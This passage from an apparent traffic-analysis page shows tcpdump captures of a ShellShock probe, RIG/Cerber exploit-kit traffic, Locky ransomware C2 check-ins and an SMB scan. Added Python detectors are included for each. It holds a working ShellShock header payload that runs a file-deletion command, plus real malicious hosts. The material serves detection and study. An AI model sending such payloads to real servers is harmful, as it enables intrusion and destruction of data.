Text Example

ShellShock Attack PCAP file Download Traffic Analysis Sample

2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1
E..X.+@.>.|….x.O…..P….S.'{…s…….
Fu..z.<.GET /cgi-bin/.svn/entries HTTP/1.1

2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 112: HTTP
E….,@.>.|….x.O…..P….S.'{…s.…..
Fu..z.<.Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu
User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271

2017-07-26 16:42:16.277082 IP 61.7.186.197.5507 > 130.253.185.203.23: Flags [S], seq 0, win 65535, length 0
E..(:(….W.=……………….P…e…
2017-07-26 16:42:16.277466 IP 60.196.157.234.47651 > 130.253.130.165.1900: UDP, length 94
E..z..@.0.j”<……..#.l.f..M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: ssdp:discover
MX: 10
ST: ssdp:all

.
2017-07-26 16:42:16.282511 IP 91.223.133.13.42880 > 130.253.95.133.3404: Flags [S], seq 670678803, win 1024, length 0
E(.(…….^[…..….L’…….P…L…
2017-07-26 16:42:16.282575 IP 91.223.133.13.42880 > 130.253.95.125.3404: Flags [S], seq 2388976086, win 1024, length 0
E(.(……RY[…..}…L.d……P….s..
2017-07-26 16:42:16.282695 IP 213.49.124.141.50470 > 130.253.126.22.81: Flags [S], seq 3098327735, win 14600, options [mss 1452,sackOK,TS val 9607180 ecr 0,nop,wscale 1], length 0
E .<.4@.5….1|…~..&.Q……….9………… …………
2017-07-26 16:42:16.283075 IP 74.94.22.81.64396 > 130.253.68.156.23: Flags [S], seq 2197636252, win 40676, length 0
E .(.p..6…J^.Q..D…….D…..P…%x..
2017-07-26 16:42:16.287606 IP 74.109.122.3.37142 > 130.253.119.199.23: Flags [S], seq 2197649351, win 2461, options [mss 1460], length 0
E..,.8..5..Jmz…w…….w…..`. .Cb……
2017-07-26 16:42:16.288426 IP 114.230.11.31.35388 > 130.253.49.6.23: Flags [S], seq 2197631238, win 38956, length 0
E..(….1…r…..1..<….1…..P..,.V..
2017-07-26 16:42:16.291979 IP 119.193.140.179.2420 > 130.253.232.246.22: Flags [S], seq 2197678326, win 1067, length 0
E..(….0…w……. t……….P..+….
2017-07-26 16:42:16.293510 IP 77.72.82.14.42775 > 130.253.225.5.3344: Flags [S], seq 1899387472, win 1024, length 0
E..(.E…..1MHR………q6ZP….P…(…
2017-07-26 16:42:16.294581 IP 77.72.82.14.42775 > 130.253.57.86.3307: Flags [S], seq 2659645233, win 1024, length 0
E..(……..MHR…9V…….1….P….~..
2017-07-26 16:42:16.296551 IP 123.188.246.124.42492 > 130.253.123.118.23: Flags [S], seq 2197650294, win 48868, length 0
E..(….1.*.{..|..{v……{v….P…….
2017-07-26 16:42:16.297055 IP 115.148.242.216.17414 > 130.253.215.62.29917: Flags [S], seq 4072809910, win 65535, options [mss 1452,nop,wscale 2,nop,nop,sackOK], length 0
E..4,^@….s……>D.t…%…………………….
2017-07-26 16:42:16.300902 IP 185.195.201.148.32512 > 130.253.123.83.1900: Flags [S], seq 0, win 65535, length 0
E(.(.a@.4………{S…l……..P…….
2017-07-26 16:42:16.301542 IP 218.76.253.134.30694 > 130.253.215.62.30208: UDP, length 31
E..;.S..p..P.L…..>w.v..”l……0
……a…………….
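
The probe above puts its payload in the User-Agent header because a CGI server exports request headers into the process environment (HTTP_USER_AGENT, HTTP_COOKIE, and so on), and bash before the CVE-2014-6271 fix executed whatever followed a function definition it imported from an environment variable. The following Python checker is an added example and not part of the captured sample: it parses a raw HTTP request, pulls the bash function-definition marker out of any header, and reports the command that would have run and the environment variable it would have arrived in. The request text is rebuilt from the capture above; the function names are my own.

```python
from __future__ import annotations

import re

# Unpatched bash imported any environment variable whose value starts with
# "() {" as a function and kept parsing past the closing "};", so the trailing
# text ran at import time. The regex captures that trailing text.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;\s*(?P<cmd>.*)")


def cgi_env_name(header_name: str) -> str:
    """Name of the CGI environment variable a request header is exported as."""
    return "HTTP_" + header_name.strip().upper().replace("-", "_")


def find_shellshock(raw_request: str) -> list[tuple[str, str, str]]:
    """Return (header, env var, trailing command) for every header whose value
    carries a bash function definition followed by extra commands."""
    lines = raw_request.replace("\r\n", "\n").split("\n")
    hits = []
    for line in lines[1:]:          # lines[0] is the request line
        if not line.strip():
            break                    # blank line ends the header block
        name, sep, value = line.partition(":")
        if not sep:
            continue
        m = SHELLSHOCK_RE.search(value)
        if m:
            hits.append((name.strip(), cgi_env_name(name), m.group("cmd").strip()))
    return hits


def targets_cgi(raw_request: str) -> bool:
    """True when the request line points under /cgi-bin/, where headers reach
    a shell; the same header against a static file never reaches bash."""
    request_line = raw_request.replace("\r\n", "\n").split("\n", 1)[0]
    parts = request_line.split()
    return len(parts) >= 2 and parts[1].startswith("/cgi-bin/")


# Constructed sample, rebuilt from the probe in the capture above.
PROBE = (
    "GET /cgi-bin/.svn/entries HTTP/1.1\r\n"
    "Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu\r\n"
    "User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271\r\n"
    "\r\n"
)

# Constructed benign request for comparison.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for header, env, cmd in find_shellshock(PROBE):
        print(f"{header} -> {env}: would run {cmd!r} (cgi target: {targets_cgi(PROBE)})")
```

The regex is deliberately loose about the function body (`() { :;};` and `() { :; };` both match) because scanners vary the whitespace; the command it reports is what an IDS should log, since the request line alone (`/cgi-bin/.svn/entries`) looks like an ordinary path probe.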

RIG Exploit Kit EK Delivers Cerber Ransomware Malware PCAP file download traffic sample

2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP: GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
E….O@…N+

.f…..!.P0.X.]..MP…….GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.basket-brabant.be/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: add.jamesthorpebourbon.com
Connection: Keep-Alive

2016-10-18 14:40:36.504124 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], ack 477, win 237, length 0
E..(.T@.5…….

.f.P.!]..M0.Z.P…E+..
2016-10-18 14:40:37.014717 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], seq 1:1322, ack 477, win 237, length 1321: HTTP: HTTP/1.1 200 OK
E..Q.U@.5…….

.f.P.!]..M0.Z.P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Tue, 18 Oct 2016 18:40:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 18876
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2016-10-18 14:41:31.393471 IP 10.10.18.102.54101 > 31.184.234.169.6892: UDP, length 9
E..%.^……

.f…..U…..Xhi008c1c4………
2016-10-18 14:41:31.393481 IP 10.10.18.102.54101 > 31.184.234.170.6892: UDP, length 9
E..%._……

.f…..U…..Whi008c1c4………
2016-10-18 14:41:31.393494 IP 10.10.18.102.54101 > 31.184.234.171.6892: UDP, length 9
E..%.`……

.f…..U…..Vhi008c1c4………
2016-10-18 14:41:31.393504 IP 10.10.18.102.54101 > 31.184.234.172.6892: UDP, length 9
E..%.a……

.f…..U…..Uhi008c1c4………
2016-10-18 14:41:31.393514 IP 10.10.18.102.54101 > 31.184.234.173.6892: UDP, length 9
E..%.b……

.f…..U…..Thi008c1c4………
2016-10-18 14:41:31.393524 IP 10.10.18.102.54101 > 31.184.234.174.6892: UDP, length 9
E..%.c……

.f…..U…..Shi008c1c4………
2016-10-18 14:41:31.393534 IP 10.10.18.102.54101 > 31.184.234.175.6892: UDP, length 9
E..%.d……

.f…..U…..Rhi008c1c4………
2016-10-18 14:41:31.393544 IP 10.10.18.102.54101 > 31.184.234.176.6892: UDP, length 9
E..%.e……

.f…..U…..Qhi008c1c4………
2016-10-18 14:41:31.393554 IP 10.10.18.102.54101 > 31.184.234.177.6892: UDP, length 9
E..%.f……

.f…..U…..Phi008c1c4………
2016-10-18 14:41:31.393565 IP 10.10.18.102.54101 > 31.184.234.178.6892: UDP, length 9
E..%.g……

.f…..U…..Ohi008c1c4………
2016-10-18 14:41:31.393575 IP 10.10.18.102.54101 > 31.184.234.179.6892: UDP, length 9
E..%.h……

.f…..U…..Nhi008c1c4………
2016-10-18 14:41:31.393585 IP 10.10.18.102.54101 > 31.184.234.180.6892: UDP, length 9
E..%.i……

.f…..U…..Mhi008c1c4………
2016-10-18 14:41:31.393598 IP 10.10.18.102.54101 > 31.184.234.181.6892: UDP, length 9
E..%.j……

.f…..U…..Lhi008c1c4………
2016-10-18 14:41:31.393608 IP 10.10.18.102.54101 > 31.184.234.182.6892: UDP, length 9
E..%.k……

.f…..U…..Khi008c1c4………
2016-10-18 14:41:31.393618 IP 10.10.18.102.54101 > 31.184.234.183.6892: UDP, length 9
E..%.l…..}

.f…..U…..Jhi008c1c4………
2016-10-18 14:41:31.393628 IP 10.10.18.102.54101 > 31.184.234.184.6892: UDP, length 9
E..%.m…..{

Locky Ransomware Variant Malware PCAP File Download Traffic Sample

2016-09-26 15:15:14.233356 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1258:1735, ack 727, win 63514, length 477: HTTP: POST /apache_handler.php HTTP/1.1
E….{@….K
.i…….P&p…n^.P…8…POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://5.196.200.247/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.196.200.247
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.233380 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 1735, win 64240, length 0
E..(…………
.i.P…n^.&p..P…[………
2016-09-26 15:15:14.233382 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1735:2515, ack 727, win 63514, length 780: HTTP
E..4.|@…..
.i…….P&p…n^.P….]..tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.233384 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 2515, win 64240, length 0
E..(…………
.i.P…n^.&p..P…X………
2016-09-26 15:15:14.390578 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [P.], seq 727:1453, ack 2515, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E……………
.i.P…n^.&p..P…Q…HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:28 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.390873 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [.], ack 1453, win 62788, length 0
E..(.}@….&
.i…….P&p…na.P..D[………
2016-09-26 15:15:14.391726 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1260:1739, ack 727, win 63514, length 479: HTTP: POST /apache_handler.php HTTP/1.1
E….~@….c
.i>……PE…}td.P….Q..POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://62.173.154.240/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 62.173.154.240
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.391855 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1739:2519, ack 727, win 63514, length 780: HTTP
E..4..@….5
.i>……PE…}td.P…&…tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.391863 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 1739, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.391865 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 2519, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.575076 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [P.], seq 727:1453, ack 2519, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E………..>…
.i.P..}td.E…P…….HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:14 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.575385 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [.], ack 1453, win 62788, length 0
E..(..@….@
.i>……PE…}tgnP..D……….
2016-09-26 15:15:14.748030 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:17.758523 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:21.819893 IP 104.239.213.7.80 > 10.9.26.105.49188: Flags [S.], seq 3863520333, ack 3107914476, win 64240, options [mss 1460], length 0
E..,……Gbh…
.i.P.$.H.M.?..`…3………
2016-09-26 15:15:21.820158 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
.ih….$.P.?…H.NP…KC……..
2016-09-26 15:15:21.820289 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [P.], seq 1:476, ack 1, win 64240, length 475: HTTP: POST /apache_handler.php HTTP/1.1
E…..@…..
.ih….$.P.?…H.NP…….POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://cifkvluxh.su/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cifkvluxh.su
Content-Length: 780
Connection: Keep-Alive
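
The three POSTs above share one shape: a bare-IP Host (then a fallback domain), a Referer that is just the host root, an XMLHttpRequest header with no page behind it, and a 780-byte form body whose field names are random and whose values are mostly non-printable bytes once the percent-encoding is undone. The Python below is an added example, not the author's tooling: it decodes the body without mangling the raw bytes and scores the request on those structural tells. The body string is copied from the capture above; the thresholds and function names are my own choices.

```python
from __future__ import annotations

import ipaddress
import math
from collections import Counter
from urllib.parse import unquote_to_bytes

PRINTABLE = set(range(0x20, 0x7F))


def decode_form(body: str) -> dict[str, bytes]:
    """Split a form-urlencoded body into raw byte values. unquote_to_bytes is
    used instead of parse_qs so bytes like %85 survive instead of being
    replaced by U+FFFD during a UTF-8 decode."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields[name] = unquote_to_bytes(value.replace("+", " "))
    return fields


def nonprintable_ratio(data: bytes) -> float:
    """Share of bytes outside printable ASCII: about 0.63 for uniformly random
    bytes, 0.0 for a genuine form submission."""
    if not data:
        return 0.0
    return sum(1 for b in data if b not in PRINTABLE) / len(data)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0..8; ciphertext or compressed data sits near the top."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def checkin_indicators(host: str, referer: str, body: str) -> list[str]:
    """Reasons a POST looks like an encrypted C2 check-in rather than a browser
    form submit. An empty list means nothing stood out."""
    reasons = []
    if is_ip_literal(host):
        reasons.append("ip-literal-host")
    if referer.rstrip("/") in (f"http://{host}", f"https://{host}"):
        reasons.append("referer-is-bare-host-root")
    blob = b"".join(decode_form(body).values())
    if nonprintable_ratio(blob) > 0.3:
        reasons.append("nonprintable-form-values")
    if shannon_entropy(blob) > 6.0:
        reasons.append("high-entropy-form-values")
    return reasons


# Form body copied from the first POST in the capture above.
LOCKY_BODY = (
    "tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b"
    "&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F"
    "&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23"
    "&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED"
    "&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D"
    "&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE"
    "&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC"
    "&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g"
    "&EJQKjhN=%21%9E%7D"
)

if __name__ == "__main__":
    print(checkin_indicators("5.196.200.247", "http://5.196.200.247/", LOCKY_BODY))
    print(checkin_indicators("www.example.com", "https://www.example.com/login", "user=alice&pass=hunter2"))
```

The 404 the server returns is not evidence of failure: the same body is retried against a second hard-coded IP and then a generated domain (cifkvluxh.su), so the client keeps walking its list regardless of the HTTP status.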

SMB NMAP Portscan Port scanning PCAP File Download Traffic Sample Analysis

2017-06-20 14:09:12.664927 IP 10.101.22.128.49739 > 221.184.213.149.445: Flags [S], seq 3893475975, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….

e…….K………… ..;…………..
2017-06-20 14:09:12.758627 IP 10.101.22.128.49741 > 212.104.117.73.445: Flags [S], seq 1202043706, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…w.
e…huI.M..G..:…… ……………..
2017-06-20 14:09:12.771825 IP 10.72.158.57.59199 > 10.101.21.107.445: Flags [S], seq 436800387, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@.~…
H.9
e.k.?… …….. .x<…………..
2017-06-20 14:09:12.785013 IP 172.20.31.74.64831 > 10.101.20.47.445: Flags [S], seq 347664739, win 8192, options [mss 1380,nop,wscale 2,sackOK,TS val 51473388 ecr 0], length 0
E..<..@.q. ….J e./.?…..c…… ..L…..d……. ..k…..
2017-06-20 14:09:12.820839 IP 10.101.22.128.49743 > 118.239.76.174.445: Flags [S], seq 502529660, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e..v.L..O…..|…… ……………..
2017-06-20 14:09:12.867372 IP 10.27.117.40.51918 > 10.101.21.40.445: Flags [S], seq 252935156, win 8192, options [mss 1380,nop,wscale 2,nop,nop,sackOK], length 0
E..4.@.m... .u( e.(......{....... .Y......d........
2017-06-20 14:09:12.867686 IP 10.101.22.128.49744 > 130.69.49.167.445: Flags [S], seq 839731710, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@....i e...E1..P..2.I....... .:&..............
2017-06-20 14:09:12.947781 IP 10.102.169.67.57901 > 10.101.21.54.445: Flags [S], seq 2258261251, win 5840, options [mss 1460,sackOK,TS val 2207468264 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length 0
E..L..@.7.^d f.C e.6.-....U.................... ..J.........L ..dD....L.....
2017-06-20 14:09:12.958471 IP 172.20.147.59.58165 > 10.101.20.79.445: Flags [S], seq 721417024, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..44.@.p.x....; e.O.5..*..@...... .................
2017-06-20 14:09:12.992756 IP 10.101.22.128.49746 > 152.222.186.96.445: Flags [S], seq 464388263, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@...n. e......R………… ……………..
2017-06-20 14:09:13.039562 IP 10.101.22.128.49748 > 29.89.169.211.445: Flags [S], seq 855875173, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….&
e…Y…T..3..e…… ……………..
2017-06-20 14:09:13.070724 IP 10.101.22.128.49749 > 152.100.211.153.445: Flags [S], seq 1583303698, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…US
e…d…U..^_L……. .S……………
2017-06-20 14:09:13.073884 IP 10.89.37.211.53044 > 10.101.21.118.445: Flags [S], seq 801397140, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4E,@.v.o.
Y%.
e.v.4../.Y……. ……………..
2017-06-20 14:09:13.226796 IP 10.101.22.128.49752 > 187.236.46.149.445: Flags [S], seq 21748602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e…….X…K.z…… ……………..
2017-06-20 14:09:13.258021 IP 10.101.22.128.49753 > 216.57.215.72.445: Flags [S], seq 4161335896, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e…9.H.Y…..X…… ..0…………..
2017-06-20 14:09:13.296307 IP 10.102.169.129.51237 > 10.101.20.177.445: Flags [S], seq 973127344, win 5840, options [mss 1460,sackOK,TS val 2207468613 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length 0
E..L..@.7.y.
f..
e…%..:………..{x………
..LE……..L
..dD….L…..
2017-06-20 14:09:13.320605 IP 10.101.22.128.49755 > 202.253.124.66.445: Flags [S], seq 2143311680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…z.
e….|B.[….W@…… .K……………
2017-06-20 14:09:13.461584 IP 10.101.22.128.49757 > 56.71.64.115.445: Flags [S], seq 868905440, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
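
Two of the captures above show the same behaviour at the summary-line level: one source sending one probe each to many destinations on one port inside a fraction of a second. In the SMB sample it is 10.101.22.128 opening TCP 445 to unrelated internet hosts (while other internal hosts are each scanned by a single outside source); in the RIG/Cerber sample it is 10.10.18.102 sending a 9-byte UDP datagram to 31.184.234.169 through .184 on port 6892, walking a contiguous block. The Python below is an added example, not part of either capture: it parses tcpdump summary lines, keeps a sliding window per (source, destination port, probe type), and raises one alert per key when the distinct-destination count crosses a threshold, noting whether the targets form one unbroken address range. The SMB lines are copied from the capture with their TCP options trimmed; the Cerber lines are regenerated from the capture's addresses with approximated 10-microsecond spacing; the thresholds are my own.

```python
from __future__ import annotations

import ipaddress
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime

# One tcpdump summary line: "<date> <time> IP <src>.<sport> > <dst>.<dport>: <rest>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): (?P<rest>.*)$"
)


@dataclass
class Event:
    ts: datetime
    src: str
    dst: str
    dport: int
    kind: str          # "SYN" (TCP connect attempt) or "UDP"


@dataclass
class Alert:
    src: str
    dport: int
    kind: str
    targets: int       # distinct destinations inside the busiest window
    contiguous: bool   # those destinations form one unbroken address range
    first: datetime
    last: datetime


def parse_line(line: str) -> Event | None:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    if rest.startswith("Flags [S],"):
        kind = "SYN"
    elif rest.startswith("UDP,"):
        kind = "UDP"
    else:
        return None     # established traffic and replies are not probes
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
    return Event(ts, m.group("src"), m.group("dst"), int(m.group("dport")), kind)


def detect_fanout(lines, window_s: float = 5.0, min_targets: int = 8) -> list[Alert]:
    """One alert per (source, dport, kind) whose distinct destinations within
    some window_s-second span reach min_targets; reports the busiest window."""
    by_key: dict[tuple[str, int, str], list[Event]] = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_key[(ev.src, ev.dport, ev.kind)].append(ev)

    alerts = []
    for (src, dport, kind), events in by_key.items():
        events.sort(key=lambda e: e.ts)
        live = Counter()            # dst -> probes still inside the window
        lo = 0
        best = None                 # (count, first ts, last ts, dsts)
        for ev in events:
            live[ev.dst] += 1
            while (ev.ts - events[lo].ts).total_seconds() > window_s:
                old = events[lo].dst
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                lo += 1
            if best is None or len(live) > best[0]:
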